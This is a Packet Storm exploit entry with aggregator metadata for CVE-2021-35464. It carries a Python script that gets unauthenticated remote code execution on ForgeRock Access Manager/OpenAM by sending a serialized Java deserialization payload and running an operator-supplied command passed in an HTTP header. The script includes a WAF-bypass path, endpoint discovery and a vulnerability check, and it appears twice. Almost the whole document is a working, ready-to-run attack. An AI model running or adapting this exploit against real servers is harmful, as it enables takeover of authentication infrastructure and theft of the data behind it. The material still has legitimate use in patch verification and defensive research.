ID PACKETSTORM:163525 Type packetstorm Reporter Photubias Modified 2021-07-16T00:00:00
Description
`# Exploit Title: ForgeRock Access Manager/OpenAM 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 2021-07-14
# Exploit Author: Photubias – tijl[dot]deneut[at]Howest[dot]be for www.ic4.be
# Vendor Advisory: [1] https://backstage.forgerock.com/knowledge/kb/article/a47894244
# Vendor Homepage: https://github.com/OpenIdentityPlatform/OpenAM/
# Version: [1] OpenAM 14.6.3
# [2] Forgerock 6.0.0.x and all versions of 6.5, up to and including 6.5.3, and is fixed as of version AM 7 released on June 29, 2021
# Tested on: OpenAM 14.6.3 and Tomcat/8.5.68 with JDK-8u292 on Debian 10
# CVE: CVE-2021-35464
#!/usr/bin/env python3
'''
Copyright 2021 Photubias(c)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
File name CVE-2021-35464.py
written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be
This is a native implementation without requirements, written in Python 3.
Works equally well on Windows as Linux (as MacOS, probably ;-)
Rewritten from and full credits to @Y4er_ChaBug:
https://github.com/Y4er/openam-CVE-2021-35464
and of course the discoverer @artsploit:
https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464
Created using https://github.com/frohoff/ysoserial
'''
import urllib.request, urllib.parse, ssl, sys, optparse
## Static vars; change at will, but recommend leaving as is
sURL = 'http://192.168.0.100:7080/openam'
sEndpoint = 'ccversion/Version'
sEndpoint = 'oauth2/..;/ccversion/Version' ## This bypasses potential WAFs
iTimeout = 5
strSerializedPayload = b'AKztAAVzcgAXamF2YS51dGlsLlByaW9yaXR5UXVldWWU2jC0-z-CsQMAAkkABHNpemVMAApjb21wYXJhdG9ydAAWTGphdmEvdXRpbC9Db21wYXJhdG9yO3hwAAAAAnNyADBvcmcuYXBhY2hlLmNsaWNrLmNvbnRyb2wuQ29sdW1uJENvbHVtbkNvbXBhcmF0b3IAAAAAAAAAAQIAAkkADWFzY2VuZGluZ1NvcnRMAAZjb2x1bW50ACFMb3JnL2FwYWNoZS9jbGljay9jb250cm9sL0NvbHVtbjt4cAAAAAFzcgAfb3JnLmFwYWNoZS5jbGljay5jb250cm9sLkNvbHVtbgAAAAAAAAABAgATWgAIYXV0b2xpbmtaAAplc2NhcGVIdG1sSQAJbWF4TGVuZ3RoTAAKYXR0cmlidXRlc3QAD0xqYXZhL3V0aWwvTWFwO0wACmNvbXBhcmF0b3JxAH4AAUwACWRhdGFDbGFzc3QAEkxqYXZhL2xhbmcvU3RyaW5nO0wACmRhdGFTdHlsZXNxAH4AB0wACWRlY29yYXRvcnQAJExvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvRGVjb3JhdG9yO0wABmZvcm1hdHEAfgAITAALaGVhZGVyQ2xhc3NxAH4ACEwADGhlYWRlclN0eWxlc3EAfgAHTAALaGVhZGVyVGl0bGVxAH4ACEwADW1lc3NhZ2VGb3JtYXR0ABlMamF2YS90ZXh0L01lc3NhZ2VGb3JtYXQ7TAAEbmFtZXEAfgAITAAIcmVuZGVySWR0ABNMamF2YS9sYW5nL0Jvb2xlYW47TAAIc29ydGFibGVxAH4AC0wABXRhYmxldAAgTG9yZy9hcGFjaGUvY2xpY2svY29udHJvbC9UYWJsZTtMAA10aXRsZVByb3BlcnR5cQB-AAhMAAV3aWR0aHEAfgAIeHAAAQAAAABwcHBwcHBwcHBwdAAQb3V0cHV0UHJvcGVydGllc3Bwc3IAHm9yZy5hcGFjaGUuY2xpY2suY29udHJvbC5UYWJsZQAAAAAAAAABAgAXSQAOYmFubmVyUG9zaXRpb25aAAlob3ZlclJvd3NaABdudWxsaWZ5Um93TGlzdE9uRGVzdHJveUkACnBhZ2VOdW1iZXJJAAhwYWdlU2l6ZUkAE3BhZ2luYXRvckF0dGFjaG1lbnRaAAhyZW5kZXJJZEkACHJvd0NvdW50WgAKc2hvd0Jhbm5lcloACHNvcnRhYmxlWgAGc29ydGVkWgAPc29ydGVkQXNjZW5kaW5nTAAHY2FwdGlvbnEAfgAITAAKY29sdW1uTGlzdHQAEExqYXZhL3V0aWwvTGlzdDtMAAdjb2x1bW5zcQB-AAdMAAtjb250cm9sTGlua3QAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvQWN0aW9uTGluaztMAAtjb250cm9sTGlzdHEAfgAQTAAMZGF0YVByb3ZpZGVydAAsTG9yZy9hcGFjaGUvY2xpY2svZGF0YXByb3ZpZGVyL0RhdGFQcm92aWRlcjtMAAZoZWlnaHRxAH4ACEwACXBhZ2luYXRvcnQAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvUmVuZGVyYWJsZTtMAAdyb3dMaXN0cQB-ABBMAAxzb3J0ZWRDb2x1bW5xAH4ACEwABXdpZHRocQB-AAh4cgAob3JnLmFwYWNoZS5jbGljay5jb250cm9sLkFic3RyYWN0Q29udHJvbAAAAAAAAAABAgAJTAAOYWN0aW9uTGlzdGVuZXJ0ACFMb3JnL2FwYWNoZS9jbGljay9BY3Rpb25MaXN0ZW5lcjtMAAphdHRyaWJ1dGVzcQB-AAdMAAliZWhhdmlvcnN0AA9MamF2YS91dGlsL1NldDtMAAxoZWFkRWxlbWVudHNxAH4AEEwACGxpc3RlbmVydAASTGphdmEvbGFuZy9PYmplY3Q7TAAObGlzdGVuZXJNZXRob2RxAH4ACEwABG5hbWVxAH4ACEwABnBhcmVudHEAfgAXTAAGc3R5bGVzcQB-AAd4cHBwcHBwcHBwcAAAAAIAAQAAAAAAAAAAAAAAAQAAAAAAAAAAAXBzcgATamF2YS51dGlsLkFycmF5TGlzdHiB0h2Zx2GdAwABSQAEc2l6ZXhwAAAAAHcEAAAAAHhzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHhwcHBwcHBwcHBwdwQAAAADc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0_BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAITAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA_____3VyAANbW0JL_RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF_gGCFTgAgAAeHAAABRfyv66vgAAADQBBgoARgCKCgCLAIwKAIsAjQoAHQCOCAB7CgAbAI8KAJAAkQoAkACSBwB8CgCLAJMIAJQKACAAlQgAlggAlwcAmAgAmQgAWQcAmgoAGwCbCACcCABxBwCdCwAWAJ4LABYAnwgAaAgAoAcAoQoAGwCiBwCjCgCkAKUIAKYHAKcIAKgKACAAqQgAqgkAJQCrBwCsCgAlAK0IAK4KAK8AsAoAIACxCACyCACzCAC0CAC1CAC2BwC3BwC4CgAwALkKADAAugoAuwC8CgAvAL0IAL4KAC8AvwoALwDACgAgAMEIAMIKABsAwwoAGwDECADFBwBlCgAbAMYIAMcHAMgIAMkIAMoHAMsKAEMAzAcAzQcAzgEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAlTHlzb3NlcmlhbC9wYXlsb2Fkcy9Ub21jYXRFY2hvSW5qZWN0OwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwDPAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAg8Y2xpbml0PgEAAWUBACBMamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uOwEAA2NscwEAEU
## Ignore unsigned certs, if any because OpenAM is default HTTP
ssl._create_default_https_context = ssl._create_unverified_context
def checkParams(options, args):
if args: sHost = args[0]
else:
sHost = input('[?] Please enter the URL ['+sURL+'] : ')
if sHost == '': sHost = sURL
if not sHost[-1:] == '/': sHost += '/'
if not sHost[:4].lower() == 'http': sHost = 'http://' + sHost
if options.command: sCMD = options.command
else: sCMD = ''
if options.proxy: sProxy = options.proxy
else: sProxy = ''
return (sHost, sCMD, sProxy)
def findEndpoint(oOpener, sHost, sProxy):
def testEndpoint(sURL):
oRequest = urllib.request.Request(sURL)
if sProxy: oRequest.set_proxy(sProxy, 'http')
try: oResponse = oOpener.open(oRequest, timeout = iTimeout)
except: return False
if oResponse.code == 200:
if 'ForgeRock' in oResponse.read().decode(errors='ignore'):
print('[+] Found potential vulnerable endpoint: ' + sURL)
return True
return False
if testEndpoint(sHost + sEndpoint): return sHost + sEndpoint
elif testEndpoint(sHost + 'openam/' + sEndpoint): return sHost + 'openam/' + sEndpoint
elif testEndpoint(sHost + 'OpenAM/' + sEndpoint): return sHost + 'OpenAM/' + sEndpoint
elif testEndpoint(sHost + 'openam/ccversion/Version'): return sHost + 'openam/ccversion/Version'
elif testEndpoint(sHost + 'OpenAM/ccversion/Version'): return sHost + 'OpenAM/ccversion/Version'
else: return ''
def testVuln(oOpener, sURL, sProxy):
oResponse = runCmd(oOpener, sURL, sProxy, 'echo CVE-2021-35464')
## The response is actually not well formed HTTP, needs manual formatting
bResp = bytearray(15) ## "CVE-2021-35464\n" should be 15 bytes
try: oResponse.readinto(bResp)
except: pass
#print(bResp.split(b'\x00')[0])
if 'CVE-2021-35464' in bResp.decode(): return True
else: return False
def runVuln(oOpener, sURL, sProxy, sCMD):
oResponse = runCmd(oOpener, sURL, sProxy, sCMD)
## The response is actually not well formed HTTP, needs manual formatting
bResp = bytearray(4096)
try: oResponse.readinto(bResp)
except: pass ## The readinto still should have worked
sResp = bResp.split(b'\x00')[0].decode()
print(sResp)
def runCmd(oOpener, sURL, sProxy, sCMD):
oData = b'jato.pageSession=' + strSerializedPayload
oHeaders = {'cmd' : sCMD}
oRequest = urllib.request.Request(url = sURL, headers = oHeaders, data = oData)
if sProxy: oRequest.set_proxy(sProxy, 'http')
return oOpener.open(oRequest, timeout = iTimeout)
def main():
usage = (
'usage: %prog [options] URL \n'
'Example: CVE-2021-35464.py -c id http://192.168.0.100:7080/openam\n'
'Example: CVE-2021-35464.py -c dir -p 127.0.0.1:8080 http://192.168.0.100:7080/openam\n'
'When in doubt, just enter a single IP address'
)
parser = optparse.OptionParser(usage=usage)
parser.add_option('--command', '-c', dest='command', help='Optional: The command to run remotely')
parser.add_option('--proxy', '-p', dest='proxy', help='Optional: HTTP proxy to use, e.g. 127.0.0.1:8080')
## Get or ask for the vars
(options, args) = parser.parse_args()
(sHost, sCMD, sProxy) = checkParams(options, args)
## Verify reachability
print('[!] Verifying reachability of ' + sHost)
oOpener = urllib.request.build_opener()
oRequest = urllib.request.Request(sHost)
if sProxy: oRequest.set_proxy(sProxy, 'http')
try: oResponse = oOpener.open(oRequest, timeout = iTimeout)
except urllib.error.HTTPError: pass
except: sys.exit('[-] Error, host ' + sHost + ' seems to be unreachable')
print('[+] Endpoint ' + sHost + ' reachable')
## Find endpoint
print('[!] Finding correct OpenAM endpoint')
sEndpoint = findEndpoint(oOpener, sHost, sProxy)
if sEndpoint == '': sys.exit('[-] Error finding the correct OpenAM endpoint or not vulnerable.')
## Verify vulnerability
if testVuln(oOpener, sEndpoint, sProxy): print('[+] !SUCCESS! Host ' + sHost + ' is vulnerable to CVE-2021-35464')
else: sys.exit('[-] Not vulnerable or this implementation does not work')
if sCMD:
print('[+] Running command "' + sCMD + '" now:\n')
runVuln(oOpener, sEndpoint, sProxy, sCMD)
else: print('[!] All done')
if __name__ == "__main__":
main()
`
{"id": "PACKETSTORM:163525", "type": "packetstorm", "bulletinFamily": "exploit", "title": "ForgeRock Access Manager/OpenAM 14.6.3 Remote Code Execution", "description": "", "published": "2021-07-16T00:00:00", "modified": "2021-07-16T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/163525/ForgeRock-Access-Manager-OpenAM-14.6.3-Remote-Code-Execution.html", "reporter": "Photubias", "references": [], "cvelist": ["CVE-2021-35464"], "immutableFields": [], "lastseen": "2021-07-16T15:00:53", "viewCount": 125, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-35464"]}, {"type": "nessus", "idList": ["WEB_APPLICATION_SCANNING_112812", "FORGEROCK_OPENAM_7_0.NASL", "OPENAM_CVE-2021-35464.NBIN"]}, {"type": "attackerkb", "idList": ["AKB:77E58EB9-547A-4137-BD9B-C2E5E487FA8E"]}, {"type": "seebug", "idList": ["SSV:99284"]}, {"type": "hackerone", "idList": ["H1:1248040", "H1:1249456"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5223F0ED8D616DB4EE860CF6B7770388", "RAPID7BLOG:8495B2B62A16EF7A1217077330A344B3"]}, {"type": "cisa", "idList": ["CISA:3A09D1755051967FC65BD11A814E9167"]}, {"type": "threatpost", "idList": ["THREATPOST:50745DFE98A2EA07C8BE5D2F2CFA940F"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163486"]}, {"type": "exploitdb", "idList": ["EDB-ID:50131"]}, {"type": "thn", "idList": ["THN:6510A3250EDBD304F93AA770592A8D14"]}, {"type": "avleonov", "idList": ["AVLEONOV:30285D85FDB40C8D55F6A24D9D446ECF", "AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5"]}], "modified": "2021-07-16T15:00:53", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-07-16T15:00:53", "rev": 2}, "vulnersScore": 5.7}, "sourceHref": "https://packetstormsecurity.com/files/download/163525/forgerock1463-exec.txt", "sourceData": "`# Exploit Title: ForgeRock Access Manager/OpenAM 14.6.3 - Remote Code Execution (RCE) (Unauthenticated) \n# Date: 2021-07-14 \n# Exploit Author: Photubias \u2013 tijl[dot]deneut[at]Howest[dot]be for www.ic4.be \n# Vendor Advisory: [1] https://backstage.forgerock.com/knowledge/kb/article/a47894244 \n# Vendor Homepage: https://github.com/OpenIdentityPlatform/OpenAM/ \n# Version: [1] OpenAM 14.6.3 \n# [2] Forgerock 6.0.0.x and all versions of 6.5, up to and including 6.5.3, and is fixed as of version AM 7 released on June 29, 2021 \n# Tested on: OpenAM 14.6.3 and Tomcat/8.5.68 with JDK-8u292 on Debian 10 \n# CVE: CVE-2021-35464 \n \n#!/usr/bin/env python3 \n \n''' \nCopyright 2021 Photubias(c) \n \nThis program is free software: you can redistribute it and/or modify \nit under the terms of the GNU General Public License as published by \nthe Free Software Foundation, either version 3 of the License, or \n(at your option) any later version. \n \nThis program is distributed in the hope that it will be useful, \nbut WITHOUT ANY WARRANTY; without even the implied warranty of \nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \nGNU General Public License for more details. \n \nYou should have received a copy of the GNU General Public License \nalong with this program. If not, see <http://www.gnu.org/licenses/>. \n \nFile name CVE-2021-35464.py \nwritten by tijl[dot]deneut[at]howest[dot]be for www.ic4.be \n \nThis is a native implementation without requirements, written in Python 3. \nWorks equally well on Windows as Linux (as MacOS, probably ;-) \n \nRewritten from and full credits to @Y4er_ChaBug: \nhttps://github.com/Y4er/openam-CVE-2021-35464 \nand of course the discoverer @artsploit: \nhttps://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464 \nCreated using https://github.com/frohoff/ysoserial \n''' \n \nimport urllib.request, urllib.parse, ssl, sys, optparse \n \n## Static vars; change at will, but recommend leaving as is \nsURL = 'http://192.168.0.100:7080/openam' \nsEndpoint = 'ccversion/Version' \nsEndpoint = 'oauth2/..;/ccversion/Version' ## This bypasses potential WAFs \niTimeout = 5 \nstrSerializedPayload = b'AKztAAVzcgAXamF2YS51dGlsLlByaW9yaXR5UXVldWWU2jC0-z-CsQMAAkkABHNpemVMAApjb21wYXJhdG9ydAAWTGphdmEvdXRpbC9Db21wYXJhdG9yO3hwAAAAAnNyADBvcmcuYXBhY2hlLmNsaWNrLmNvbnRyb2wuQ29sdW1uJENvbHVtbkNvbXBhcmF0b3IAAAAAAAAAAQIAAkkADWFzY2VuZGluZ1NvcnRMAAZjb2x1bW50ACFMb3JnL2FwYWNoZS9jbGljay9jb250cm9sL0NvbHVtbjt4cAAAAAFzcgAfb3JnLmFwYWNoZS5jbGljay5jb250cm9sLkNvbHVtbgAAAAAAAAABAgATWgAIYXV0b2xpbmtaAAplc2NhcGVIdG1sSQAJbWF4TGVuZ3RoTAAKYXR0cmlidXRlc3QAD0xqYXZhL3V0aWwvTWFwO0wACmNvbXBhcmF0b3JxAH4AAUwACWRhdGFDbGFzc3QAEkxqYXZhL2xhbmcvU3RyaW5nO0wACmRhdGFTdHlsZXNxAH4AB0wACWRlY29yYXRvcnQAJExvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvRGVjb3JhdG9yO0wABmZvcm1hdHEAfgAITAALaGVhZGVyQ2xhc3NxAH4ACEwADGhlYWRlclN0eWxlc3EAfgAHTAALaGVhZGVyVGl0bGVxAH4ACEwADW1lc3NhZ2VGb3JtYXR0ABlMamF2YS90ZXh0L01lc3NhZ2VGb3JtYXQ7TAAEbmFtZXEAfgAITAAIcmVuZGVySWR0ABNMamF2YS9sYW5nL0Jvb2xlYW47TAAIc29ydGFibGVxAH4AC0wABXRhYmxldAAgTG9yZy9hcGFjaGUvY2xpY2svY29udHJvbC9UYWJsZTtMAA10aXRsZVByb3BlcnR5cQB-AAhMAAV3aWR0aHEAfgAIeHAAAQAAAABwcHBwcHBwcHBwdAAQb3V0cHV0UHJvcGVydGllc3Bwc3IAHm9yZy5hcGFjaGUuY2xpY2suY29udHJvbC5UYWJsZQAAAAAAAAABAgAXSQAOYmFubmVyUG9zaXRpb25aAAlob3ZlclJvd3NaABdudWxsaWZ5Um93TGlzdE9uRGVzdHJveUkACnBhZ2VOdW1iZXJJAAhwYWdlU2l6ZUkAE3BhZ2luYXRvckF0dGFjaG1lbnRaAAhyZW5kZXJJZEkACHJvd0NvdW50WgAKc2hvd0Jhbm5lcloACHNvcnRhYmxlWgAGc29ydGVkWgAPc29ydGVkQXNjZW5kaW5nTAAHY2FwdGlvbnEAfgAITAAKY29sdW1uTGlzdHQAEExqYXZhL3V0aWwvTGlzdDtMAAdjb2x1bW5zcQB-AAdMAAtjb250cm9sTGlua3QAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvQWN0aW9uTGluaztMAAtjb250cm9sTGlzdHEAfgAQTAAMZGF0YVByb3ZpZGVydAAsTG9yZy9hcGFjaGUvY2xpY2svZGF0YXByb3ZpZGVyL0RhdGFQcm92aWRlcjtMAAZoZWlnaHRxAH4ACEwACXBhZ2luYXRvcnQAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvUmVuZGVyYWJsZTtMAAdyb3dMaXN0cQB-ABBMAAxzb3J0ZWRDb2x1bW5xAH4ACEwABXdpZHRocQB-AAh4cgAob3JnLmFwYWNoZS5jbGljay5jb250cm9sLkFic3RyYWN0Q29udHJvbAAAAAAAAAABAgAJTAAOYWN0aW9uTGlzdGVuZXJ0ACFMb3JnL2FwYWNoZS9jbGljay9BY3Rpb25MaXN0ZW5lcjtMAAphdHRyaWJ1dGVzcQB-AAdMAAliZWhhdmlvcnN0AA9MamF2YS91dGlsL1NldDtMAAxoZWFkRWxlbWVudHNxAH4AEEwACGxpc3RlbmVydAASTGphdmEvbGFuZy9PYmplY3Q7TAAObGlzdGVuZXJNZXRob2RxAH4ACEwABG5hbWVxAH4ACEwABnBhcmVudHEAfgAXTAAGc3R5bGVzcQB-AAd4cHBwcHBwcHBwcAAAAAIAAQAAAAAAAAAAAAAAAQAAAAAAAAAAAXBzcgATamF2YS51dGlsLkFycmF5TGlzdHiB0h2Zx2GdAwABSQAEc2l6ZXhwAAAAAHcEAAAAAHhzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHhwcHBwcHBwcHBwdwQAAAADc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0_BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAITAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA_____3VyAANbW0JL_RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF_gGCFTgAgAAeHAAABRfyv66vgAAADQBBgoARgCKCgCLAIwKAIsAjQoAHQCOCAB7CgAbAI8KAJAAkQoAkACSBwB8CgCLAJMIAJQKACAAlQgAlggAlwcAmAgAmQgAWQcAmgoAGwCbCACcCABxBwCdCwAWAJ4LABYAnwgAaAgAoAcAoQoAGwCiBwCjCgCkAKUIAKYHAKcIAKgKACAAqQgAqgkAJQCrBwCsCgAlAK0IAK4KAK8AsAoAIACxCACyCACzCAC0CAC1CAC2BwC3BwC4CgAwALkKADAAugoAuwC8CgAvAL0IAL4KAC8AvwoALwDACgAgAMEIAMIKABsAwwoAGwDECADFBwBlCgAbAMYIAMcHAMgIAMkIAMoHAMsKAEMAzAcAzQcAzgEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAlTHlzb3NlcmlhbC9wYXlsb2Fkcy9Ub21jYXRFY2hvSW5qZWN0OwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwDPAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAg8Y2xpbml0PgEAAWUBACBMamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uOwEAA2NscwEAEU \n \n## Ignore unsigned certs, if any because OpenAM is default HTTP \nssl._create_default_https_context = ssl._create_unverified_context \n \ndef checkParams(options, args): \nif args: sHost = args[0] \nelse: \nsHost = input('[?] Please enter the URL ['+sURL+'] : ') \nif sHost == '': sHost = sURL \nif not sHost[-1:] == '/': sHost += '/' \nif not sHost[:4].lower() == 'http': sHost = 'http://' + sHost \nif options.command: sCMD = options.command \nelse: sCMD = '' \nif options.proxy: sProxy = options.proxy \nelse: sProxy = '' \nreturn (sHost, sCMD, sProxy) \n \ndef findEndpoint(oOpener, sHost, sProxy): \ndef testEndpoint(sURL): \noRequest = urllib.request.Request(sURL) \nif sProxy: oRequest.set_proxy(sProxy, 'http') \ntry: oResponse = oOpener.open(oRequest, timeout = iTimeout) \nexcept: return False \nif oResponse.code == 200: \nif 'ForgeRock' in oResponse.read().decode(errors='ignore'): \nprint('[+] Found potential vulnerable endpoint: ' + sURL) \nreturn True \nreturn False \n \nif testEndpoint(sHost + sEndpoint): return sHost + sEndpoint \nelif testEndpoint(sHost + 'openam/' + sEndpoint): return sHost + 'openam/' + sEndpoint \nelif testEndpoint(sHost + 'OpenAM/' + sEndpoint): return sHost + 'OpenAM/' + sEndpoint \nelif testEndpoint(sHost + 'openam/ccversion/Version'): return sHost + 'openam/ccversion/Version' \nelif testEndpoint(sHost + 'OpenAM/ccversion/Version'): return sHost + 'OpenAM/ccversion/Version' \nelse: return '' \n \ndef testVuln(oOpener, sURL, sProxy): \noResponse = runCmd(oOpener, sURL, sProxy, 'echo CVE-2021-35464') \n## The response is actually not well formed HTTP, needs manual formatting \nbResp = bytearray(15) ## \"CVE-2021-35464\\n\" should be 15 bytes \ntry: oResponse.readinto(bResp) \nexcept: pass \n#print(bResp.split(b'\\x00')[0]) \nif 'CVE-2021-35464' in bResp.decode(): return True \nelse: return False \n \ndef runVuln(oOpener, sURL, sProxy, sCMD): \noResponse = runCmd(oOpener, sURL, sProxy, sCMD) \n## The response is actually not well formed HTTP, needs manual formatting \nbResp = bytearray(4096) \ntry: oResponse.readinto(bResp) \nexcept: pass ## The readinto still should have worked \nsResp = bResp.split(b'\\x00')[0].decode() \nprint(sResp) \n \ndef runCmd(oOpener, sURL, sProxy, sCMD): \noData = b'jato.pageSession=' + strSerializedPayload \noHeaders = {'cmd' : sCMD} \noRequest = urllib.request.Request(url = sURL, headers = oHeaders, data = oData) \nif sProxy: oRequest.set_proxy(sProxy, 'http') \nreturn oOpener.open(oRequest, timeout = iTimeout) \n \ndef main(): \nusage = ( \n'usage: %prog [options] URL \\n' \n'Example: CVE-2021-35464.py -c id http://192.168.0.100:7080/openam\\n' \n'Example: CVE-2021-35464.py -c dir -p 127.0.0.1:8080 http://192.168.0.100:7080/openam\\n' \n'When in doubt, just enter a single IP address' \n) \n \nparser = optparse.OptionParser(usage=usage) \nparser.add_option('--command', '-c', dest='command', help='Optional: The command to run remotely') \nparser.add_option('--proxy', '-p', dest='proxy', help='Optional: HTTP proxy to use, e.g. 127.0.0.1:8080') \n \n## Get or ask for the vars \n(options, args) = parser.parse_args() \n(sHost, sCMD, sProxy) = checkParams(options, args) \n \n## Verify reachability \nprint('[!] Verifying reachability of ' + sHost) \noOpener = urllib.request.build_opener() \noRequest = urllib.request.Request(sHost) \nif sProxy: oRequest.set_proxy(sProxy, 'http') \ntry: oResponse = oOpener.open(oRequest, timeout = iTimeout) \nexcept urllib.error.HTTPError: pass \nexcept: sys.exit('[-] Error, host ' + sHost + ' seems to be unreachable') \nprint('[+] Endpoint ' + sHost + ' reachable') \n \n## Find endpoint \nprint('[!] Finding correct OpenAM endpoint') \nsEndpoint = findEndpoint(oOpener, sHost, sProxy) \nif sEndpoint == '': sys.exit('[-] Error finding the correct OpenAM endpoint or not vulnerable.') \n \n## Verify vulnerability \nif testVuln(oOpener, sEndpoint, sProxy): print('[+] !SUCCESS! Host ' + sHost + ' is vulnerable to CVE-2021-35464') \nelse: sys.exit('[-] Not vulnerable or this implementation does not work') \nif sCMD: \nprint('[+] Running command \"' + sCMD + '\" now:\\n') \nrunVuln(oOpener, sEndpoint, sProxy, sCMD) \nelse: print('[!] All done') \n \nif __name__ == \"__main__\": \nmain() \n \n`\n", "cvss2": {}, "cvss3": {}}
